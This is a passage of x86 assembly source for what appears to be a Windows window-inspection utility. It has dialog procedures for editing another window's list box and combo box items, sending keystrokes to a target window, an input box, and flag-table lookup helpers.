	cmp	[wParam],ID_FLAGS_LIST
	jne	.quit
	mov	ebx,[lParam]
	stdcall [CreateCompatibleDC],[ebx+DRAWITEMSTRUCT.hDC]
	mov	[hBackDC],eax
	xor	edx,edx
	mov	eax,[ebx+DRAWITEMSTRUCT.rcItem.right]
	mov	ecx,[ebx+DRAWITEMSTRUCT.rcItem.bottom]
	sub	eax,[ebx+DRAWITEMSTRUCT.rcItem.left]
	sub	ecx,[ebx+DRAWITEMSTRUCT.rcItem.top]
	mov	[rcItem.left],edx
	mov	[rcItem.top],edx
	mov	[rcItem.right],eax
	mov	[rcItem.bottom],ecx
	stdcall [CreateCompatibleBitmap],[ebx+DRAWITEMSTRUCT.hDC],eax,ecx
	mov	[hBackBmp],eax
	stdcall [SelectObject],[hBackDC],eax
	test	[ebx+DRAWITEMSTRUCT.itemState],ODS_SELECTED
	mov	eax,[hFontList]
	mov	esi,COLOR_WINDOW
	mov	edi,COLOR_WINDOWTEXT
	jz	@F
	mov	eax,[hFontListBold]
	mov	esi,COLOR_HIGHLIGHT
	mov	edi,COLOR_HIGHLIGHTTEXT
@@:	stdcall [SelectObject],[hBackDC],eax
	stdcall [SetBkMode],[hBackDC],OPAQUE
	stdcall [GetSysColorBrush],esi
	stdcall [FillRect],[hBackDC],OFFSET rcItem,eax
	stdcall [GetSysColor],esi
	stdcall [SetBkColor],[hBackDC],eax
	stdcall [GetSysColor],edi
	stdcall [SetTextColor],[hBackDC],eax

	mov	[rc.left],3
	mov	[rc.top],3
	mov	[rc.right],14
	mov	[rc.bottom],14
	stdcall [GetSysColorBrush],COLOR_WINDOW
	stdcall [FillRect],[hBackDC],OFFSET rc,eax
	cmp	[ebx+DRAWITEMSTRUCT.itemData],0
	je	@F
	stdcall [GetWindowLong],[hWnd],GWL_USERDATA
	mov	eax,[eax]
	and	eax,[ebx+DRAWITEMSTRUCT.itemData]
	cmp	eax,[ebx+DRAWITEMSTRUCT.itemData]
	jne	.nochk
@@:	mov	eax,ILD_NORMAL
	test	[ebx+DRAWITEMSTRUCT.itemState],ODS_SELECTED
	jz	@F
	or	eax,ILD_SELECTED
@@:	stdcall [ImageList_Draw],[hImageList],1,[hBackDC],0,0,eax
.nochk: stdcall [GetSysColorBrush],COLOR_BTNFACE
	stdcall [FrameRect],[hBackDC],OFFSET rc,eax

	stdcall [SendMessage],[ebx+DRAWITEMSTRUCT.hwndItem],LB_GETTEXT,[ebx+DRAWITEMSTRUCT.itemID],OFFSET szValue
	add	[rcItem.left],20
	stdcall [DrawText],[hBackDC],OFFSET szValue,eax,OFFSET rcItem,DT_SINGLELINE+DT_VCENTER
	sub	[rcItem.left],20
	stdcall [BitBlt],[ebx+DRAWITEMSTRUCT.hDC],[ebx+DRAWITEMSTRUCT.rcItem.left],[ebx+DRAWITEMSTRUCT.rcItem.top],[rcItem.right],[rcItem.bottom],[hBackDC],0,0,SRCCOPY
	stdcall [DeleteObject],[hBackBmp]
	stdcall [DeleteDC],[hBackDC]
	test	[ebx+DRAWITEMSTRUCT.itemState],ODS_FOCUS
	jz	.quit
	lea	eax,[ebx+DRAWITEMSTRUCT.rcItem]
	stdcall [DrawFocusRect],[ebx+DRAWITEMSTRUCT.hDC],eax
	jmp	.quit
.close: 	; CLOSE
	stdcall [DeleteObject],[hFontListBold]
	stdcall [DeleteObject],[hFontList]
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgSendKeysProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET sendkeysmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,[lParam]
	stdcall [SendDlgItemMessage],[hWnd],ID_SENDKEYS_KEYS,EM_SETLIMITTEXT,100h,0
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_SENDKEYS_SEND	; Send
		stdcall [GetDlgItemText],[hWnd],ID_SENDKEYS_KEYS,OFFSET szValue,100h
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		mov	esi,OFFSET szValue
	.send:	xor	eax,eax
		lodsb
		test	eax,eax
		jz	.quit
		cmp	eax,13
		je	.send
		cmp	eax,10
		je	.send
		cmp	eax,"a"
		jb	@F
		cmp	eax,"z"
		ja	@F
		sub	eax,"a"-"A"
	@@:	mov	edi,eax
		stdcall [SendMessage],ebx,WM_KEYDOWN,eax,0
		stdcall [SendMessage],ebx,WM_KEYUP,edi,0
		jmp	.send
	.elseif ax,e,ID_SENDKEYS_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgListBoxProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET listboxmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit
.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_LISTBOX_LIST
	stdcall [GetClientRect],eax,OFFSET rc
	mov	ebx,[rc.right]
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	sub	ebx,40
	sar	ebx,1
	mov	[lvc.mask],LVCF_TEXT+LVCF_WIDTH
	mov	[lvc.cx],40
	mov	[lvc.pszText],OFFSET szColIndex
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_INSERTCOLUMN,0,OFFSET lvc
	mov	[lvc.cx],ebx
	mov	[lvc.pszText],OFFSET szColTitle
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_INSERTCOLUMN,1,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColItemData
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT+LVS_EX_SUBITEMIMAGES+LVS_EX_HEADERDRAGDROP+LVS_EX_LABELTIP
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	; populate list
.list:	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_DELETEALLITEMS,0,0
	xor	esi,esi
	jmp	.chk
.next:	mov	[lvi.mask],LVIF_TEXT
	mov	[lvi.iItem],esi
	and	[lvi.iSubItem],0
	mov	[lvi.pszText],OFFSET szValue
	ccall	[wsprintf],OFFSET szValue,OFFSET szValueFormat,esi
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_INSERTITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	stdcall [SendMessage],ebx,LB_GETTEXT,esi,OFFSET szValue
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	stdcall [SendMessage],ebx,LB_GETITEMDATA,esi,0
	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,eax
	stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_SETITEM,0,OFFSET lvi
	inc	esi
.chk:	stdcall [SendMessage],ebx,LB_GETCOUNT,0,0
	cmp	esi,eax
	jl	.next
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_LISTBOX_ADD 	; Add
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,LB_ADDSTRING,0,OFFSET szValue
		mov	esi,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_ITEMDATA,OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		stdcall [SendMessage],ebx,LB_SETITEMDATA,esi,eax
		jmp	.list
	.elseif ax,e,ID_LISTBOX_UPDATE	; Update
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,LB_DELETESTRING,esi,0
		stdcall [SendMessage],ebx,LB_INSERTSTRING,esi,OFFSET szValue
		mov	esi,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		stdcall [SendMessage],ebx,LB_SETITEMDATA,esi,eax
		jmp	.list
	.elseif ax,e,ID_LISTBOX_REMOVE	; Remove
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,LB_DELETESTRING,esi,0
		jmp	.list
	.elseif ax,e,ID_LISTBOX_MOVEUP	; Move Up
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,LB_GETTEXTLEN,esi,0
		add	eax,05h
		stdcall [GlobalAlloc],GMEM_MOVEABLE,eax
		push	eax
		stdcall [GlobalLock],eax
		mov	edi,eax
		popd	[edi]
		add	eax,04h
		stdcall [SendMessage],ebx,LB_GETTEXT,esi,eax
		stdcall [SendMessage],ebx,LB_GETITEMDATA,esi,0
		push	eax
		stdcall [SendMessage],ebx,LB_DELETESTRING,esi,0
		dec	esi
		lea	eax,[edi+04h]
		stdcall [SendMessage],ebx,LB_INSERTSTRING,esi,eax
		stdcall [SendMessage],ebx,LB_SETITEMDATA,esi
		pushd	[edi]
		stdcall [GlobalUnlock],[edi]
		call	[GlobalFree]
		jmp	.list
	.elseif ax,e,ID_LISTBOX_MOVEDOWN; Move Down
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,LB_GETTEXTLEN,esi,0
		add	eax,05h
		stdcall [GlobalAlloc],GMEM_MOVEABLE,eax
		push	eax
		stdcall [GlobalLock],eax
		mov	edi,eax
		popd	[edi]
		add	eax,04h
		stdcall [SendMessage],ebx,LB_GETTEXT,esi,eax
		stdcall [SendMessage],ebx,LB_GETITEMDATA,esi,0
		push	eax
		stdcall [SendMessage],ebx,LB_DELETESTRING,esi,0
		inc	esi
		lea	eax,[edi+04h]
		stdcall [SendMessage],ebx,LB_INSERTSTRING,esi,eax
		stdcall [SendMessage],ebx,LB_SETITEMDATA,esi
		pushd	[edi]
		stdcall [GlobalUnlock],[edi]
		call	[GlobalFree]
		jmp	.list
	.elseif ax,e,ID_LISTBOX_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.notify:	; NOTIFY
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_ITEMCHANGED
		mov	eax,[eax+NMLISTVIEW.iItem]
		cmp	eax,-1
		je	.quit
		mov	[lvi.mask],LVIF_TEXT
		mov	[lvi.iItem],eax
		mov	[lvi.iSubItem],1
		mov	[lvi.pszText],OFFSET szValue
		mov	[lvi.cchTextMax],100h
		stdcall [GetDlgItem],[hWnd],ID_LISTBOX_UPDATE
		stdcall [EnableWindow],eax,1
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETITEM,0,OFFSET lvi
		stdcall [SetDlgItemText],[hWnd],ID_LISTBOX_TITLE,OFFSET szValue
		inc	[lvi.iSubItem]
		stdcall [SendDlgItemMessage],[hWnd],ID_LISTBOX_LIST,LVM_GETITEM,0,OFFSET lvi
		stdcall [SetDlgItemText],[hWnd],ID_LISTBOX_ITEMDATA,OFFSET szValue
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgComboBoxProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET comboboxmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_COMBOBOX_LIST
	stdcall [GetClientRect],eax,OFFSET rc
	mov	ebx,[rc.right]
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	sub	ebx,40
	sar	ebx,1
	mov	[lvc.mask],LVCF_TEXT+LVCF_WIDTH
	mov	[lvc.cx],40
	mov	[lvc.pszText],OFFSET szColIndex
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_INSERTCOLUMN,0,OFFSET lvc
	mov	[lvc.cx],ebx
	mov	[lvc.pszText],OFFSET szColTitle
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_INSERTCOLUMN,1,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColItemData
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT+LVS_EX_SUBITEMIMAGES+LVS_EX_HEADERDRAGDROP+LVS_EX_LABELTIP
	mov	ebx,[lParam]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,ebx
	; populate combo
.combo: stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_DELETEALLITEMS,0,0
	xor	esi,esi
	jmp	.chk
.next:	mov	[lvi.mask],LVIF_TEXT
	mov	[lvi.iItem],esi
	and	[lvi.iSubItem],0
	mov	[lvi.pszText],OFFSET szValue
	ccall	[wsprintf],OFFSET szValue,OFFSET szValueFormat,esi
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_INSERTITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	stdcall [SendMessage],ebx,CB_GETLBTEXT,esi,OFFSET szValue
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	stdcall [SendMessage],ebx,CB_GETITEMDATA,esi,0
	ccall	[wsprintf],OFFSET szValue,OFFSET szHandleFormat,eax
	stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_SETITEM,0,OFFSET lvi
	inc	esi
.chk:	stdcall [SendMessage],ebx,CB_GETCOUNT,0,0
	cmp	esi,eax
	jl	.next
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_COMBOBOX_ADD	 ; Add
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,CB_ADDSTRING,0,OFFSET szValue
		mov	esi,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_ITEMDATA,OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		stdcall [SendMessage],ebx,CB_SETITEMDATA,esi,eax
		jmp	.combo
	.elseif ax,e,ID_COMBOBOX_UPDATE  ; Update
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,CB_DELETESTRING,esi,0
		stdcall [SendMessage],ebx,CB_INSERTSTRING,esi,OFFSET szValue
		mov	esi,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall hstr2dw,OFFSET szValue
		stdcall [SendMessage],ebx,CB_SETITEMDATA,esi,eax
		jmp	.combo
	.elseif ax,e,ID_COMBOBOX_REMOVE  ; Remove
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,CB_DELETESTRING,esi,0
		jmp	.combo
	.elseif ax,e,ID_COMBOBOX_MOVEUP  ; Move Up
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,CB_GETLBTEXTLEN,esi,0
		add	eax,05h
		stdcall [GlobalAlloc],GMEM_MOVEABLE,eax
		push	eax
		stdcall [GlobalLock],eax
		mov	edi,eax
		popd	[edi]
		add	eax,04h
		stdcall [SendMessage],ebx,CB_GETLBTEXT,esi,eax
		stdcall [SendMessage],ebx,CB_GETITEMDATA,esi,0
		push	eax
		stdcall [SendMessage],ebx,CB_DELETESTRING,esi,0
		dec	esi
		lea	eax,[edi+04h]
		stdcall [SendMessage],ebx,CB_INSERTSTRING,esi,eax
		stdcall [SendMessage],ebx,CB_SETITEMDATA,esi
		pushd	[edi]
		stdcall [GlobalUnlock],[edi]
		call	[GlobalFree]
		jmp	.combo
	.elseif ax,e,ID_COMBOBOX_MOVEDOWN; Move Down
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue,100h
		stdcall [SendMessage],ebx,CB_GETLBTEXTLEN,esi,0
		add	eax,05h
		stdcall [GlobalAlloc],GMEM_MOVEABLE,eax
		push	eax
		stdcall [GlobalLock],eax
		mov	edi,eax
		popd	[edi]
		add	eax,04h
		stdcall [SendMessage],ebx,CB_GETLBTEXT,esi,eax
		stdcall [SendMessage],ebx,CB_GETITEMDATA,esi,0
		push	eax
		stdcall [SendMessage],ebx,CB_DELETESTRING,esi,0
		inc	esi
		lea	eax,[edi+04h]
		stdcall [SendMessage],ebx,CB_INSERTSTRING,esi,eax
		stdcall [SendMessage],ebx,CB_SETITEMDATA,esi
		pushd	[edi]
		stdcall [GlobalUnlock],[edi]
		call	[GlobalFree]
		jmp	.combo
	.elseif ax,e,ID_COMBOBOX_CLOSE	 ; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.notify:	; NOTIFY
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_ITEMCHANGED
		mov	eax,[eax+NMLISTVIEW.iItem]
		cmp	eax,-1
		je	.quit
		mov	[lvi.mask],LVIF_TEXT
		mov	[lvi.iItem],eax
		mov	[lvi.iSubItem],1
		mov	[lvi.pszText],OFFSET szValue
		mov	[lvi.cchTextMax],100h
		stdcall [GetDlgItem],[hWnd],ID_COMBOBOX_UPDATE
		stdcall [EnableWindow],eax,1
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETITEM,0,OFFSET lvi
		stdcall [SetDlgItemText],[hWnd],ID_COMBOBOX_TITLE,OFFSET szValue
		inc	[lvi.iSubItem]
		stdcall [SendDlgItemMessage],[hWnd],ID_COMBOBOX_LIST,LVM_GETITEM,0,OFFSET lvi
		stdcall [SetDlgItemText],[hWnd],ID_COMBOBOX_ITEMDATA,OFFSET szValue
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgListViewProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET listviewmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_LISTVIEW_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgTreeViewProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET treeviewmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_TREEVIEW_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgToolbarProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET toolbarmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_TOOLBAR_CLOSE	; Close
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgStatusbarProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET statusbarmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_STATUSBAR_CLOSE	; Statusbar
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgTabProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET tabmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_TAB_CLOSE		; Statusbar
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc DlgInputBoxProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET inputboxmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	jne	.scan
	xor	eax,eax
	jmp	.quit

.initdlg:	; INITDIALOG
	mov	ebx,[lParam]
	stdcall [SetDlgItemText],[hWnd],ID_INPUTBOX_PROMPT,[ebx+00h]
	stdcall [SetDlgItemText],[hWnd],ID_INPUTBOX_VALUE,[ebx+04h]
	stdcall [SetWindowLong],[hWnd],GWL_USERDATA,[lParam]
	xor	eax,eax
	inc	eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,ID_INPUTBOX_OK 	; OK
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetDlgItemText],[hWnd],ID_INPUTBOX_VALUE,[eax+04h],[eax+08h]
		stdcall [PostMessage],[hWnd],WM_CLOSE,1,0
	.elseif ax,e,ID_INPUTBOX_CANCEL ; Cancel
		stdcall [PostMessage],[hWnd],WM_CLOSE,0,0
	.endif
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],[wParam]
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc InputBox,pszPrompt,pszValue,dwValueLength
	enter
	lea	eax,[pszPrompt]
	stdcall [DialogBoxParam],[hInstance],IDD_INPUTBOX,0,OFFSET DlgInputBoxProc,eax
	return
;##########################################################################
proc GetFlags,dwFlags,lpFlagTable,pszFlags,bInclusive
	enter
	push	ebx esi edi
	mov	esi,[lpFlagTable]
	mov	edi,[pszFlags]
	mov	byte [edi],0
.next:	lodsd
	cmp	eax,"ENDL"
	je	.quit
	test	eax,eax
	jnz	@F
	cmp	[bInclusive],eax
	je	.skip
@@:	mov	ecx,[dwFlags]
	and	ecx,eax
	cmp	ecx,eax
	jne	.skip
	;test    [dwFlags],eax
	;jz      .skip
@@:	lodsb
	stosb
	cmp	al,0
	jne	@B
	mov	al,"+"
	dec	edi
	stosb
	jmp	.next
.skip:	lodsb
	cmp	al,0
	je	.next
	jmp	.skip
.quit:	xor	eax,eax
	dec	edi
	stosb
	pop	edi esi ebx
	return
;##########################################################################
proc GetValue,_dwValue,lpLookupTable
	enter
	push	ebx esi edi
	mov	esi,[lpFlagTable]
	xor	ecx,ecx
.next:	lodsd
	cmp	eax,"ENDL"
	je	.quit
	cmp	eax,[_dwValue]
	jne	.skip
	mov	ecx,esi
	jmp	.quit
.skip:	lodsb
	cmp	al,0
	je	.next
	jmp	.skip
.quit:	pop	edi esi ebx
	mov	eax,ecx
	return
;##########################################################################
proc Lookup,pszValue,lpLookupTable
	enter
	push	ebx esi edi
	mov	esi,[lpLookupTable]
.next:	xor	ecx,ecx
	lodsd
	cmp	eax,"ENDL"
	mov	ebx,eax
	je	.quit
	stdcall match,esi,[pszValue]
	test	eax,eax
	jz	.skip
	jnz	.fnd
	xor	eax,eax
	mov	edi,[pszValue]
@@:	lodsb
	cmp	al,[edi]
	jne	.skip
	test	eax,eax
	jz	.fnd
	inc	edi
	jmp	@B
.skip:	dec	esi
@@:	lodsb
	test	eax,eax
	jnz	@B
	jmp	.next
.fnd:	xor	ecx,ecx
	mov	eax,ebx
	inc	ecx
.quit:	pop	edi esi ebx
	return
;##########################################################################
proc AddFlagsList,hList,lpTable,bInclusive
	enter
	push	esi
	mov	esi,[lpTable]
.next:	lodsd
	cmp	eax,"ENDL"
	je	.quit
	test	eax,eax
	jnz	@F
	cmp	[bInclusive],eax
	je	.skip
@@:	push	eax
	stdcall [SendMessage],[hList],LB_ADDSTRING,0,esi
	stdcall [SendMessage],[hList],LB_SETITEMDATA,eax	; dwData on stack
.skip:	xor	eax,eax
@@:	lodsb
	test	eax,eax
	jz	.next
	jmp	@B
.quit:	pop	esi
	return
;##########################################################################
proc CombineFlags,dwOperation,lpTable
	enter
	push	ebx esi
	xor	ebx,ebx
	mov	esi,[lpTable]
.next:	lodsd
	cmp	eax,"ENDL"
	je	.quit
	cmp	[dwOperation],1 ; add
	je	.add
	cmp	[dwOperation],2 ; sub
	je	.sub
	cmp	[dwOperation],3 ; and
	je	.and
